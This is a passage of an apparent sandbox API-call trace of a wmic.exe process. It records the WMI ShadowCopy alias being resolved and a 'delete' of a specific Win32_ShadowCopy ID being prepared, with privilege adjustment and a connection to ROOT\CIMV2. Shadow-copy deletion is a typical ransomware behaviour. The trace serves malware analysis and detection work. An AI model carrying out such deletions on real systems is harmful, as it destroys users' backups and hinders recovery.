returned 0x0 [0117.111] free (_Block=0x32cbe0) [0117.111] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.111] malloc (_Size=0x3e) returned 0x32cfa0 [0117.112] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.112] malloc (_Size=0x18) returned 0x32cbe0 [0117.112] IWbemClassObject:Get (in: This=0x1c304e0, wszName="PWhere", lFlags=0, pVal=0x12f2e0*(varType=0x0, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1=0x17e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f2e0*(varType=0x8, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.112] free (_Block=0x32cbe0) [0117.112] lstrlenW (lpString=" Where ID = '#'") returned 15 [0117.112] malloc (_Size=0x20) returned 0x32cff0 [0117.112] lstrlenW (lpString=" Where ID = '#'") returned 15 [0117.112] malloc (_Size=0x18) returned 0x32cbe0 [0117.112] IWbemClassObject:Get (in: This=0x1c304e0, wszName="Connection", lFlags=0, pVal=0x12f2e0*(varType=0x0, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1=0x1cbd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f2e0*(varType=0xd, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c309c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.112] free (_Block=0x32cbe0) [0117.112] IUnknown:QueryInterface (in: This=0x1c309c0, riid=0xff807360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x12f2d0 | out: ppvObject=0x12f2d0*=0x1c309c0) returned 0x0 [0117.112] GetCurrentThreadId () returned 0x488 [0117.112] ??0CHString@@QEAA@XZ () returned 0x12f1f8 [0117.112] malloc (_Size=0x18) returned 0x32cbe0 [0117.113] IWbemClassObject:Get (in: This=0x1c309c0, wszName="Namespace", lFlags=0, pVal=0x12f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff81738f, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.113] free (_Block=0x32cbe0) [0117.113] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0117.113] malloc (_Size=0x16) returned 0x32cbe0 [0117.113] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0117.113] malloc (_Size=0x18) returned 0x32cae0 [0117.113] IWbemClassObject:Get (in: This=0x1c309c0, wszName="Locale", lFlags=0, pVal=0x12f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.113] free (_Block=0x32cae0) [0117.113] lstrlenW (lpString="ms_409") returned 6 [0117.113] malloc (_Size=0xe) returned 0x32cae0 [0117.113] lstrlenW (lpString="ms_409") returned 6 [0117.113] malloc (_Size=0x18) returned 0x32cb80 [0117.113] IWbemClassObject:Get (in: This=0x1c309c0, wszName="User", lFlags=0, pVal=0x12f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.113] free (_Block=0x32cb80) [0117.113] malloc (_Size=0x18) returned 0x32cb80 [0117.113] IWbemClassObject:Get (in: This=0x1c309c0, wszName="Password", lFlags=0, pVal=0x12f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.114] free (_Block=0x32cb80) [0117.114] malloc (_Size=0x18) returned 0x32cb80 [0117.114] IWbemClassObject:Get (in: This=0x1c309c0, wszName="Server", lFlags=0, pVal=0x12f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.114] free (_Block=0x32cb80) [0117.114] lstrlenW (lpString=".") returned 1 [0117.114] malloc (_Size=0x4) returned 0x327140 [0117.114] lstrlenW (lpString=".") returned 1 [0117.114] malloc (_Size=0x18) returned 0x32cb80 [0117.114] IWbemClassObject:Get (in: This=0x1c309c0, wszName="Authority", lFlags=0, pVal=0x12f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0x32cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0117.114] free (_Block=0x32cb80) [0117.114] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.114] IUnknown:Release (This=0x1c309c0) returned 0x1 [0117.114] GetCurrentThreadId () returned 0x488 [0117.130] ??0CHString@@QEAA@XZ () returned 0x12f1f8 [0117.132] malloc (_Size=0x18) returned 0x32cb80 [0117.133] IWbemClassObject:Get (in: This=0x1c304e0, wszName="__RELPATH", lFlags=0, pVal=0x12f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fa658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0117.134] free (_Block=0x32cb80) [0117.134] malloc (_Size=0x18) returned 0x32cb80 [0117.134] GetCurrentThreadId () returned 0x488 [0117.134] ??0CHString@@QEAA@XZ () returned 0x12f078 [0117.134] ??0CHString@@QEAA@PEBG@Z () returned 0x12f090 [0117.134] ??0CHString@@QEAA@AEBV0@@Z () returned 0x12f020 [0117.134] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0117.134] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x32d020 [0117.134] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0117.134] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x12efe0 [0117.134] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x12f028 [0117.134] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f090 [0117.134] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0117.134] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0117.134] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x12efe8 [0117.134] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f020 [0117.134] ??1CHString@@QEAA@XZ () returned 0x1 [0117.134] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x32d090 [0117.135] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0117.135] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x12efe0 [0117.135] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x12f028 [0117.135] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f090 [0117.135] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0117.135] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0117.135] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x12efe8 [0117.135] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f020 [0117.135] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.135] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0117.135] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.135] malloc (_Size=0x18) returned 0x32cba0 [0117.135] malloc (_Size=0x18) returned 0x32cc00 [0117.135] malloc (_Size=0x18) returned 0x32cc20 [0117.135] malloc (_Size=0x18) returned 0x32cc40 [0117.135] malloc (_Size=0x18) returned 0x32cc60 [0117.135] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0117.135] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0117.136] malloc (_Size=0x18) returned 0x32cc80 [0117.136] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0117.136] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0117.136] malloc (_Size=0x18) returned 0x32cca0 [0117.136] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0117.136] SysStringLen (param_1="\"") returned 0x1 [0117.136] free (_Block=0x32cc80) [0117.136] free (_Block=0x32cc60) [0117.136] free (_Block=0x32cc40) [0117.136] free (_Block=0x32cc20) [0117.136] free (_Block=0x32cc00) [0117.137] free (_Block=0x32cba0) [0117.137] IWbemServices:GetObject (in: This=0x1c23b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x12f068*=0x0, ppCallResult=0x0 | out: ppObject=0x12f068*=0x1c30a50, ppCallResult=0x0) returned 0x0 [0117.138] malloc (_Size=0x18) returned 0x32cba0 [0117.138] IWbemClassObject:Get (in: This=0x1c30a50, wszName="Text", lFlags=0, pVal=0x12f0a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff872ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x12f0a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f4ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x17e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0117.138] free (_Block=0x32cba0) [0117.138] SafeArrayGetLBound (in: psa=0x1f4ab0, nDim=0x1, plLbound=0x12f080 | out: plLbound=0x12f080) returned 0x0 [0117.138] SafeArrayGetUBound (in: psa=0x1f4ab0, nDim=0x1, plUbound=0x12f070 | out: plUbound=0x12f070) returned 0x0 [0117.138] SafeArrayGetElement (in: psa=0x1f4ab0, rgIndices=0x12f064, pv=0x12f0b8 | out: pv=0x12f0b8) returned 0x0 [0117.138] malloc (_Size=0x18) returned 0x32cba0 [0117.138] malloc (_Size=0x18) returned 0x32cc00 [0117.138] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0117.138] free (_Block=0x32cba0) [0117.138] IUnknown:Release (This=0x1c30a50) returned 0x0 [0117.138] free (_Block=0x32cca0) [0117.138] ??1CHString@@QEAA@XZ () returned 0x62f48001 [0117.138] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.139] free (_Block=0x32cb80) [0117.139] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.139] lstrlenW (lpString="Shadow copy management.") returned 23 [0117.139] malloc (_Size=0x30) returned 0x3285c0 [0117.139] lstrlenW (lpString="Shadow copy management.") returned 23 [0117.139] free (_Block=0x32cc00) [0117.139] IUnknown:Release (This=0x1c304e0) returned 0x0 [0117.139] free (_Block=0x32cbc0) [0117.139] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.139] lstrlenW (lpString="PATH") returned 4 [0117.139] lstrlenW (lpString="where") returned 5 [0117.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0117.139] lstrlenW (lpString="WHERE") returned 5 [0117.139] lstrlenW (lpString="where") returned 5 [0117.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0117.139] lstrlenW (lpString="/") returned 1 [0117.139] lstrlenW (lpString="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 43 [0117.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0117.139] lstrlenW (lpString="-") returned 1 [0117.139] lstrlenW (lpString="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 43 [0117.139] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0117.140] lstrlenW (lpString="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 43 [0117.140] malloc (_Size=0x58) returned 0x32d020 [0117.140] lstrlenW (lpString="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 43 [0117.140] lstrlenW (lpString="/") returned 1 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0117.140] lstrlenW (lpString="-") returned 1 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] malloc (_Size=0xe) returned 0x32cbc0 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] lstrlenW (lpString="GET") returned 3 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0117.140] lstrlenW (lpString="LIST") returned 4 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0117.140] lstrlenW (lpString="SET") returned 3 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0117.140] lstrlenW (lpString="CREATE") returned 6 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0117.140] lstrlenW (lpString="CALL") returned 4 [0117.140] lstrlenW (lpString="delete") returned 6 [0117.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0117.141] lstrlenW (lpString="ASSOC") returned 5 [0117.141] lstrlenW (lpString="delete") returned 6 [0117.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0117.141] lstrlenW (lpString="DELETE") returned 6 [0117.141] lstrlenW (lpString="delete") returned 6 [0117.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0117.141] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.141] malloc (_Size=0x3e) returned 0x32d080 [0117.141] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.141] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0117.141] malloc (_Size=0x18) returned 0x32cc00 [0117.141] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0117.141] lstrlenW (lpString="FROM") returned 4 [0117.141] lstrlenW (lpString="*") returned 1 [0117.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0117.141] malloc (_Size=0x18) returned 0x32cb80 [0117.141] free (_Block=0x32cc00) [0117.141] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0117.141] lstrlenW (lpString="FROM") returned 4 [0117.141] lstrlenW (lpString="from") returned 4 [0117.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0117.141] malloc (_Size=0x18) returned 0x32cc00 [0117.142] free (_Block=0x32cb80) [0117.142] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0117.142] malloc (_Size=0x18) returned 0x32cb80 [0117.142] free (_Block=0x32cc00) [0117.142] free (_Block=0x32d080) [0117.142] free (_Block=0x32cb80) [0117.142] lstrlenW (lpString="SET") returned 3 [0117.142] lstrlenW (lpString="delete") returned 6 [0117.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0117.142] lstrlenW (lpString="CREATE") returned 6 [0117.142] lstrlenW (lpString="delete") returned 6 [0117.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0117.142] free (_Block=0x32cef0) [0117.142] malloc (_Size=0x8) returned 0x326f20 [0117.142] lstrlenW (lpString="GET") returned 3 [0117.143] lstrlenW (lpString="delete") returned 6 [0117.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0117.143] lstrlenW (lpString="LIST") returned 4 [0117.143] lstrlenW (lpString="delete") returned 6 [0117.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0117.143] lstrlenW (lpString="ASSOC") returned 5 [0117.143] lstrlenW (lpString="delete") returned 6 [0117.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0117.143] WbemLocator:IUnknown:AddRef (This=0x1c11390) returned 0x3 [0117.143] free (_Block=0x33dfb0) [0117.143] lstrlenW (lpString="") returned 0 [0117.143] lstrlenW (lpString="XDUWTFONO") returned 9 [0117.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0117.143] lstrlenW (lpString="XDUWTFONO") returned 9 [0117.143] malloc (_Size=0x14) returned 0x32cb80 [0117.143] lstrlenW (lpString="XDUWTFONO") returned 9 [0117.143] GetCurrentThreadId () returned 0x488 [0117.143] GetCurrentProcess () returned 0xffffffffffffffff [0117.143] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12f440 | out: TokenHandle=0x12f440*=0x27c) returned 1 [0117.143] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12f438 | out: TokenInformation=0x0, ReturnLength=0x12f438) returned 0 [0117.143] malloc (_Size=0x118) returned 0x32d080 [0117.143] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x32d080, TokenInformationLength=0x118, ReturnLength=0x12f438 | out: TokenInformation=0x32d080, ReturnLength=0x12f438) returned 1 [0117.143] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x32d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-2081127913, Attributes=0xdcf0), (Luid.LowPart=0x0, Luid.HighPart=3329776, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0117.144] free (_Block=0x32d080) [0117.144] CloseHandle (hObject=0x27c) returned 1 [0117.144] lstrlenW (lpString="GET") returned 3 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0117.144] lstrlenW (lpString="LIST") returned 4 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0117.144] lstrlenW (lpString="SET") returned 3 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0117.144] lstrlenW (lpString="CALL") returned 4 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0117.144] lstrlenW (lpString="ASSOC") returned 5 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0117.144] lstrlenW (lpString="CREATE") returned 6 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0117.144] lstrlenW (lpString="DELETE") returned 6 [0117.144] lstrlenW (lpString="delete") returned 6 [0117.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0117.145] malloc (_Size=0x18) returned 0x32cc00 [0117.145] lstrlenA (lpString="") returned 0 [0117.145] malloc (_Size=0x2) returned 0x33dfb0 [0117.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff80314c, cbMultiByte=-1, lpWideCharStr=0x33dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.145] free (_Block=0x33dfb0) [0117.145] malloc (_Size=0x18) returned 0x32cca0 [0117.145] lstrlenA (lpString="") returned 0 [0117.145] malloc (_Size=0x2) returned 0x33dfb0 [0117.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff80314c, cbMultiByte=-1, lpWideCharStr=0x33dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0117.145] free (_Block=0x33dfb0) [0117.145] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.145] malloc (_Size=0x3e) returned 0x32d080 [0117.145] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0117.145] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0117.145] malloc (_Size=0x18) returned 0x32cba0 [0117.145] free (_Block=0x32cca0) [0117.145] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0117.145] lstrlenW (lpString="FROM") returned 4 [0117.146] lstrlenW (lpString="*") returned 1 [0117.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0117.146] malloc (_Size=0x18) returned 0x32cca0 [0117.146] free (_Block=0x32cba0) [0117.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0117.146] lstrlenW (lpString="FROM") returned 4 [0117.146] lstrlenW (lpString="from") returned 4 [0117.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0117.146] malloc (_Size=0x18) returned 0x32cba0 [0117.146] free (_Block=0x32cca0) [0117.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0117.146] malloc (_Size=0x18) returned 0x32cca0 [0117.146] free (_Block=0x32cba0) [0117.146] free (_Block=0x32d080) [0117.146] malloc (_Size=0x18) returned 0x32cba0 [0117.146] malloc (_Size=0x18) returned 0x32cc20 [0117.146] malloc (_Size=0x18) returned 0x32cc40 [0117.146] malloc (_Size=0x18) returned 0x32cc60 [0117.147] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0117.147] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0117.147] malloc (_Size=0x18) returned 0x32cc80 [0117.147] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0117.147] SysStringLen (param_1=" WHERE ") returned 0x7 [0117.147] malloc (_Size=0x18) returned 0x32ccc0 [0117.147] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0117.147] SysStringLen (param_1="ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 0x2b [0117.147] free (_Block=0x32cc00) [0117.147] free (_Block=0x32cc80) [0117.147] free (_Block=0x32cc60) [0117.147] free (_Block=0x32cc40) [0117.147] free (_Block=0x32cc20) [0117.147] free (_Block=0x32cba0) [0117.147] ??0CHString@@QEAA@XZ () returned 0x12f3b0 [0117.148] GetCurrentThreadId () returned 0x488 [0117.148] malloc (_Size=0x18) returned 0x32cba0 [0117.148] malloc (_Size=0x18) returned 0x32cc20 [0117.148] malloc (_Size=0x18) returned 0x32cc40 [0117.148] malloc (_Size=0x18) returned 0x32cc60 [0117.148] malloc (_Size=0x18) returned 0x32cc80 [0117.148] SysStringLen (param_1="\\\\") returned 0x2 [0117.148] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0117.148] malloc (_Size=0x18) returned 0x32cc00 [0117.148] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0117.148] SysStringLen (param_1="\\") returned 0x1 [0117.148] malloc (_Size=0x18) returned 0x32cce0 [0117.148] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0117.148] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0117.148] free (_Block=0x32cc00) [0117.149] free (_Block=0x32cc80) [0117.149] free (_Block=0x32cc60) [0117.149] free (_Block=0x32cc40) [0117.149] free (_Block=0x32cc20) [0117.149] free (_Block=0x32cba0) [0117.149] malloc (_Size=0x18) returned 0x32cba0 [0117.149] malloc (_Size=0x18) returned 0x32cc20 [0117.149] malloc (_Size=0x18) returned 0x32cc40 [0117.149] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c11390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8729d0 | out: ppNamespace=0xff8729d0*=0x1c23c18) returned 0x0 